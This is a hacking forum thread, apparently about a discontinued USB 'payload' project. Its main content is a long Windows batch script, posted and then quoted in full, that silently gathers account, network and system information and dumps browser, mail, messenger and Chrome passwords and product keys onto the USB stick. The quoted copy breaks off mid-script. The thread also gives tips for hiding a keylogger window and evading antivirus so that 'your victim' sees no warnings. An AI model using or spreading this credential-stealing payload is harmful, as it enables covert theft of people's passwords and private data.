Jen Posted July 29, 2010 Share Posted July 29, 2010 Everyone thinks we have to, but no one wants to do it Quote Link to comment Share on other sites More sharing options...
trialqw Posted September 4, 2010 Share Posted September 4, 2010 (edited) Slurp2 doesn't work when tried on windows 7... It copies the desktop but not the My Documents... Or did I just miss something? Edit: Oh it's (Project) dead.... Edited September 4, 2010 by trialqw Quote Link to comment Share on other sites More sharing options...
Gn0m3 Posted February 1, 2011 Share Posted February 1, 2011 It would be nice if you could post the source of all regarding this project so I and whoever is willing may continue with it. It's a nice set so I wouldn't like it dying... Sorry for my english I'm Argentinian... Regards. Gn0m3 Quote Link to comment Share on other sites More sharing options...
Infiltrator Posted February 5, 2011 Share Posted February 5, 2011 So far what AVs have you managed to disable? Just wondering cause some AVs have protection that prevents them from being disabled in the first place. Quote Link to comment Share on other sites More sharing options...
nopenopenope Posted April 28, 2011 Share Posted April 28, 2011 So far what AVs have you managed to disable? Just wondering cause some AVs have protection that prevents them from being disabled in the first place. :( dead project infiltrator, its good work, needs to be resurrected. Quote Link to comment Share on other sites More sharing options...
0hWhatsH1sFace Posted October 5, 2011 Share Posted October 5, 2011 I did this on a computer and now I can't get it off. How would I do so? I can't even get the Anti-Virus to turn back on. Please help asap Quote Link to comment Share on other sites More sharing options...
razorlala Posted December 7, 2011 Share Posted December 7, 2011 I did this on a computer and now I can't get it off. How would I do so? I can't even get the Anti-Virus to turn back on. Please help asap u remind me of myself years back where i made a dos virus and open it, resulting in my bios being flashed with virus. lolol. did u try registry? considering its been 2 months, perhaps u alr got it fixed. well, watever. really appreciate it if the source could be up lol. Quote Link to comment Share on other sites More sharing options...
dnv Posted December 12, 2011 Share Posted December 12, 2011 They should revive this project man B) - Why did it stop? Quote Link to comment Share on other sites More sharing options...
0xPHK Posted January 26, 2012 Share Posted January 26, 2012 because the ducky has pwned the autorun function ;) Quote Link to comment Share on other sites More sharing options...
powerkickeR Posted January 27, 2012 Share Posted January 27, 2012 Hey guys, does this still work? If so, I have so questions. Thanks ;p. Quote Link to comment Share on other sites More sharing options...
powerkickeR Posted January 27, 2012 Share Posted January 27, 2012 I can't find the edit button...sorry. Every time I try to install or enable a module, it says "The system cannot find the file specified", T_T. Quote Link to comment Share on other sites More sharing options...
Tox1k Posted February 17, 2012 Share Posted February 17, 2012 No, it is picked up by AV's a lot. However, I've been recently messing around with what I'll call "GhostPad" for now, and I'm making one that doesn't get picked up by most AVs, so it's undetectable, and is just to recover info from computers, no PWdump because it's detected by most AVs. GhostPad. If you want it truely undetectable, IE your victim won't get any warnings no matter what, delete everything from nirsoft (chromepass, iehv, iepv, mailpv, mspass, produkey). Yeah, but this stuff is mainly dead. What might interest the OP is this if you throw on a command line switch, then you can have your keylogger write and hide in a "ghosted" folder. Also, use this in a .vbs file and open it with a batch file referencing your start, and it'll run without a window. CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False Also, making something similar to USB 3.0 (so AVs can't delete files): Download, make a CD partition, add your ISO. Make an ISO with MagicISO or some other software. :P What I had planned was a Swiss Army Knife, includes ByteSpy, Cain, Cheat Engine, md5 Hash Changer, IP Changer, PortBlocker, Mac Address Changer, Trainer Maker, UDP-Unicorn, WireShark, Panther, smsniff, LanSchool Crasher, VirtualBox, and uTorrent and that with the payload was all under 150 mb. batch file for payload: @echo off :: Thanks to GuidoZ for the template idea. :: I don't know who originally made this forensics, but it has been upgraded over time by me. :: Setting Log File Location SET logdir="%1\logs\%computername%" IF NOT EXIST %1\logs\%computername% ( MD %1\logs\%computername% ) :: Adding an ignore for your own computer IF EXIST "%systemroot%\safe.dat" goto End IF NOT EXIST "%systemroot%\safe.dat" goto INFO :INFO ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt ECHO +-----------------------------------------+ >> %1\logs\%computername%\info.txt ECHO + + >> %1\logs\%computername%\info.txt ECHO + yyy_not's Payload / Swiss Army Knife + >> %1\logs\%computername%\info.txt ECHO + + >> %1\logs\%computername%\info.txt ECHO +-----------------------------------------+ >> %1\logs\%computername%\info.txt ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt ECHO + http://tox1kmods.webs.com + >> %1\logs\%computername%\info.txt ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt ECHO [Time Started: %date% %time%] >> %1\logs\%computername%\info.txt ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt goto LOCALACCTS :LOCALACCTS ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt ECHO + [Local User Accounts] +>> %1\logs\%computername%\localaccts-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\localaccts-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt echo Local User Accounts: >>%1\logs\%computername%\localaccts-%computername%.txt net users >> %1\logs\%computername%\localaccts-%computername%.txt echo Currently Logged on Users: >>%1\logs\%computername%\localaccts-%computername%.txt psloggedon /accepteula >> %1\logs\%computername%\localaccts-%computername%.txt echo Local Groups: >>%1\logs\%computername%\localaccts-%computername%.txt net localgroup >> %1\logs\%computername%\localaccts-%computername%.txt echo Members of the local administrators group: >>%1\logs\%computername%\localaccts-%computername%.txt net localgroup administrators >> %1\logs\%computername%\localaccts-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\localaccts-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\localaccts-%computername%.txt goto LOCALNET :LOCALNET ECHO +-----------------------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt ECHO + [Network Info, ARP Tables, Open Connections, Firewall Status] +>> %1\logs\%computername%\localnet-%computername%.txt ECHO +-----------------------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\localnet-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt echo Current IP Configuration: >> %1\logs\%computername%\localnet-%computername%.txt ipconfig /all >> %1\logs\%computername%\localnet-%computername%.txt echo Contents of the DNS Cache: >> %1\logs\%computername%\localnet-%computername%.txt ipconfig /displaydns >> %1\logs\%computername%\localnet-%computername%.txt echo ARP Table Contents: >> %1\logs\%computername%\localnet-%computername%.txt arp -a >> %1\logs\%computername%\localnet-%computername%.txt echo Status of active TCP and UDP connections: >> %1\logs\%computername%\localnet-%computername%.txt netstat -ano >> %1\logs\%computername%\localnet-%computername%.txt echo Routing Table: >> %1\logs\%computername%\localnet-%computername%.txt route print >> %1\logs\%computername%\localnet-%computername%.txt echo Hosts file contents: >> %1\logs\%computername%\localnet-%computername%.txt type %systemroot%\system32\drivers\etc\hosts >> %1\logs\%computername%\localnet-%computername%.txt echo Windows Firewall Configuration: >> %1\logs\%computername%\localnet-%computername%.txt netsh firewall show state >> %1\logs\%computername%\localnet-%computername%.txt echo Windows Firewall service state: >> %1\logs\%computername%\localnet-%computername%.txt netsh firewall show service >> %1\logs\%computername%\localnet-%computername%.txt echo Mapped Network Drives: >> %1\logs\%computername%\localnet-%computername%.txt net use >> %1\logs\%computername%\localnet-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\localnet-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\localnet-%computername%.txt goto SYSINFO :SYSINFO ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO + [installed Software, Running Processes] + >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt echo Machine Information: >> %1\logs\%computername%\sysinfo-%computername%.txt psinfo /accepteula /h /s >> %1\logs\%computername%\sysinfo-%computername%.txt echo Running Processes: >> %1\logs\%computername%\sysinfo-%computername%.txt pslist -t /accepteula >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO + [services from Running Processes] + >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt echo Services running from each process: >> %1\logs\%computername%\sysinfo-%computername%.txt tasklist /svc >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO + [state of Services on Machine] + >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt echo Service states: >> %1\logs\%computername%\sysinfo-%computername%.txt sc query state= all >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO + [installed Printers] + >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt echo Printer Information: >> %1\logs\%computername%\sysinfo-%computername%.txt cscript %WINDIR%\System32\Prnmngr.vbs -l >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO + [Group Policies] + >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt echo Effective group policies: >> %1\logs\%computername%\sysinfo-%computername%.txt gpresult -r -z >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO + [Drivers in use] + >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt echo Drivers currently in use: >> %1\logs\%computername%\sysinfo-%computername%.txt driverquery >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO + [system Variables] + >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt echo System Variables: >> %1\logs\%computername%\sysinfo-%computername%.txt set >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO + [startup Run RunOnce] + >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt REM Export the Run and RunOnce Values inside HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run %1\logs\%computername%\HKLMrun.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce %1\logs\%computername%\HKLMrunonce.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run %1\logs\%computername%\HKCUrun.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce %1\logs\%computername%\HKCUrunonce.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\sysinfo-%computername%.txt goto ERRORLOG :ERRORLOG ECHO +---------------------------------------+ >> %1\logs\%computername%\syslog-%computername%.txt ECHO + [system Error Log] +>> %1\logs\%computername%\syslog-%computername%.txt ECHO +---------------------------------------+ >> %1\logs\%computername%\syslog-%computername%.txt ECHO. >> %1\logs\%computername%\syslog-%computername%.txt ECHO This will only work in Windows Vista/XP >> %1\logs\%computername%\syslog-%computername%.txt ECHO. >> %1\logs\%computername%\syslog-%computername%.txt REM Grab Sytem Error Log for Review (Error ONLY) cscript %WINDIR%\System32\eventquery.vbs /fi "Type eq Error" /V /L System >> %1\logs\%computername%\syslog-%computername%.txt REM Grab Application Error Logs for Review cscript %WINDIR%\System32\eventquery.vbs /fi "Type eq Error" /V /L Application >> %1\logs\%computername%\syslog-%computername%.txt goto PORT :PORT ECHO +----------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt ECHO + [Port Scan] + >> %1\logs\%computername%\netlog-info-%computername%.txt ECHO +----------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\netlog-info-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt START .\portqry -local -l %1\logs\%computername%\netlog-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\netlog-info-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt goto MD5 :MD5 ECHO +----------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt ECHO + [MD5 Hashes of the system directory] +>> %1\logs\%computername%\osmd5-%computername%.txt ECHO +----------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\osmd5-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt echo %date% %time% >> %1\logs\%computername%\osmd5-%computername%.txt md5sums %systemroot% >> %1\logs\%computername%\osmd5-%computername%.txt md5sums %systemroot%\system >> %1\logs\%computername%\osmd5-%computername%.txt md5sums %systemroot%\system32 >> %1\logs\%computername%\osmd5-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\osmd5-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\osmd5-%computername%.txt goto MDINFO :MDINFO IF NOT EXIST %1\logs\%computername%\userinfo ( MD %1\logs\%computername%\userinfo\ ) goto MDPASS :MDPASS IF NOT EXIST %1\logs\%computername%\userinfo\pass ( MD %1\logs\%computername%\userinfo\pass\ ) goto IEFIREHIST :IEFIREHIST :INFO ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO + [information Recovery] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\urllog-%computername%.txt ECHO + [Dumping IE and FireFox history] +>> %1\logs\%computername%\userinfo\urllog-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\urllog-%computername%.txt START .\FirePassword.exe >> %1\logs\%computername%\userinfo\pass\firepass-%computername%.txt START cscript .\IE_FireFox.vbs >> %1\logs\%computername%\userinfo\firehistorylog-%computername%.txt START .\iehv.exe /stext %1\logs\%computername%\userinfo\IElog-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO Passwords stored in .\pass\firepass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO Passwords stored in .\pass\firehistorylog-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO Passwords stored in .\pass\IElog-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO + [Dump Mail PW] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO Passwords stored in .\pass\mailpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt START .\mailpv.exe /stext "%1\logs\%computername%\userinfo\pass\mailpass-%computername%.txt" /sort "Application" /sort "Name" ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO + [Dump IE PW] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO Passwords stored in .\pass\IEpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt START .\iepv.exe /stext "%1\logs\%computername%\userinfo\pass\IEpass-%computername%.txt" /sort "Entry Name" ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO + [Dump Messanger PW] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO Passwords will be dumped in .\pass\MSpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt START .\mspass.exe /stext %1\logs\%computername%\userinfo\pass\MSpass-%computername%.txt ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO + [Dump Product Keys] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt START .\PRODUKEY.exe /nosavereg /stext "%1\logs\%computername%\userinfo\productkeys-%computername%.txt" /remote %computername% >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO + [Dumping Chrome Passwords] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO Passwords stored in .\pass\chromepass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt START .\ChromePass.exe /stext %1\logs\%computername%\userinfo\pass\chromepass-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt goto END :END ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt ECHO [Time Completed: %date% %time%] >> %1\logs\%computername%\info.txt ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt START EXPLORER.EXE exit Quote Link to comment Share on other sites More sharing options...
iknuts Posted March 19, 2012 Share Posted March 19, 2012 Hi guys... i still have know idea how to install this... i realize its been 3years since anyone responeded to this topic, but i'm hoping someone can help me out. my USB is NON U3, i've got the payload, but everytime i run the menu.bat and try and enable modules, the command result is 'File not found'... what am i doing wrong? thanks Quote Link to comment Share on other sites More sharing options...
iknuts Posted March 19, 2012 Share Posted March 19, 2012 No, it is picked up by AV's a lot. However, I've been recently messing around with what I'll call "GhostPad" for now, and I'm making one that doesn't get picked up by most AVs, so it's undetectable, and is just to recover info from computers, no PWdump because it's detected by most AVs. GhostPad. If you want it truely undetectable, IE your victim won't get any warnings no matter what, delete everything from nirsoft (chromepass, iehv, iepv, mailpv, mspass, produkey). Yeah, but this stuff is mainly dead. What might interest the OP is this if you throw on a command line switch, then you can have your keylogger write and hide in a "ghosted" folder. Also, use this in a .vbs file and open it with a batch file referencing your start, and it'll run without a window. CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False Also, making something similar to USB 3.0 (so AVs can't delete files): Download, make a CD partition, add your ISO. Make an ISO with MagicISO or some other software. :P What I had planned was a Swiss Army Knife, includes ByteSpy, Cain, Cheat Engine, md5 Hash Changer, IP Changer, PortBlocker, Mac Address Changer, Trainer Maker, UDP-Unicorn, WireShark, Panther, smsniff, LanSchool Crasher, VirtualBox, and uTorrent and that with the payload was all under 150 mb. batch file for payload: @echo off :: Thanks to GuidoZ for the template idea. :: I don't know who originally made this forensics, but it has been upgraded over time by me. :: Setting Log File Location SET logdir="%1\logs\%computername%" IF NOT EXIST %1\logs\%computername% ( MD %1\logs\%computername% ) :: Adding an ignore for your own computer IF EXIST "%systemroot%\safe.dat" goto End IF NOT EXIST "%systemroot%\safe.dat" goto INFO :INFO ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt ECHO +-----------------------------------------+ >> %1\logs\%computername%\info.txt ECHO + + >> %1\logs\%computername%\info.txt ECHO + yyy_not's Payload / Swiss Army Knife + >> %1\logs\%computername%\info.txt ECHO + + >> %1\logs\%computername%\info.txt ECHO +-----------------------------------------+ >> %1\logs\%computername%\info.txt ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt ECHO + http://tox1kmods.webs.com + >> %1\logs\%computername%\info.txt ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt ECHO [Time Started: %date% %time%] >> %1\logs\%computername%\info.txt ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt goto LOCALACCTS :LOCALACCTS ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt ECHO + [Local User Accounts] +>> %1\logs\%computername%\localaccts-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\localaccts-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt echo Local User Accounts: >>%1\logs\%computername%\localaccts-%computername%.txt net users >> %1\logs\%computername%\localaccts-%computername%.txt echo Currently Logged on Users: >>%1\logs\%computername%\localaccts-%computername%.txt psloggedon /accepteula >> %1\logs\%computername%\localaccts-%computername%.txt echo Local Groups: >>%1\logs\%computername%\localaccts-%computername%.txt net localgroup >> %1\logs\%computername%\localaccts-%computername%.txt echo Members of the local administrators group: >>%1\logs\%computername%\localaccts-%computername%.txt net localgroup administrators >> %1\logs\%computername%\localaccts-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\localaccts-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\localaccts-%computername%.txt goto LOCALNET :LOCALNET ECHO +-----------------------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt ECHO + [Network Info, ARP Tables, Open Connections, Firewall Status] +>> %1\logs\%computername%\localnet-%computername%.txt ECHO +-----------------------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\localnet-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt echo Current IP Configuration: >> %1\logs\%computername%\localnet-%computername%.txt ipconfig /all >> %1\logs\%computername%\localnet-%computername%.txt echo Contents of the DNS Cache: >> %1\logs\%computername%\localnet-%computername%.txt ipconfig /displaydns >> %1\logs\%computername%\localnet-%computername%.txt echo ARP Table Contents: >> %1\logs\%computername%\localnet-%computername%.txt arp -a >> %1\logs\%computername%\localnet-%computername%.txt echo Status of active TCP and UDP connections: >> %1\logs\%computername%\localnet-%computername%.txt netstat -ano >> %1\logs\%computername%\localnet-%computername%.txt echo Routing Table: >> %1\logs\%computername%\localnet-%computername%.txt route print >> %1\logs\%computername%\localnet-%computername%.txt echo Hosts file contents: >> %1\logs\%computername%\localnet-%computername%.txt type %systemroot%\system32\drivers\etc\hosts >> %1\logs\%computername%\localnet-%computername%.txt echo Windows Firewall Configuration: >> %1\logs\%computername%\localnet-%computername%.txt netsh firewall show state >> %1\logs\%computername%\localnet-%computername%.txt echo Windows Firewall service state: >> %1\logs\%computername%\localnet-%computername%.txt netsh firewall show service >> %1\logs\%computername%\localnet-%computername%.txt echo Mapped Network Drives: >> %1\logs\%computername%\localnet-%computername%.txt net use >> %1\logs\%computername%\localnet-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\localnet-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\localnet-%computername%.txt goto SYSINFO :SYSINFO ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO + [installed Software, Running Processes] + >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt echo Machine Information: >> %1\logs\%computername%\sysinfo-%computername%.txt psinfo /accepteula /h /s >> %1\logs\%computername%\sysinfo-%computername%.txt echo Running Processes: >> %1\logs\%computername%\sysinfo-%computername%.txt pslist -t /accepteula >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO + [services from Running Processes] + >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt echo Services running from each process: >> %1\logs\%computername%\sysinfo-%computername%.txt tasklist /svc >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO + [state of Services on Machine] + >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt echo Service states: >> %1\logs\%computername%\sysinfo-%computername%.txt sc query state= all >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO + [installed Printers] + >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt echo Printer Information: >> %1\logs\%computername%\sysinfo-%computername%.txt cscript %WINDIR%\System32\Prnmngr.vbs -l >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO + [Group Policies] + >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt echo Effective group policies: >> %1\logs\%computername%\sysinfo-%computername%.txt gpresult -r -z >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO + [Drivers in use] + >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt echo Drivers currently in use: >> %1\logs\%computername%\sysinfo-%computername%.txt driverquery >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO + [system Variables] + >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt echo System Variables: >> %1\logs\%computername%\sysinfo-%computername%.txt set >> %1\logs\%computername%\sysinfo-%computername%.txt ECHO 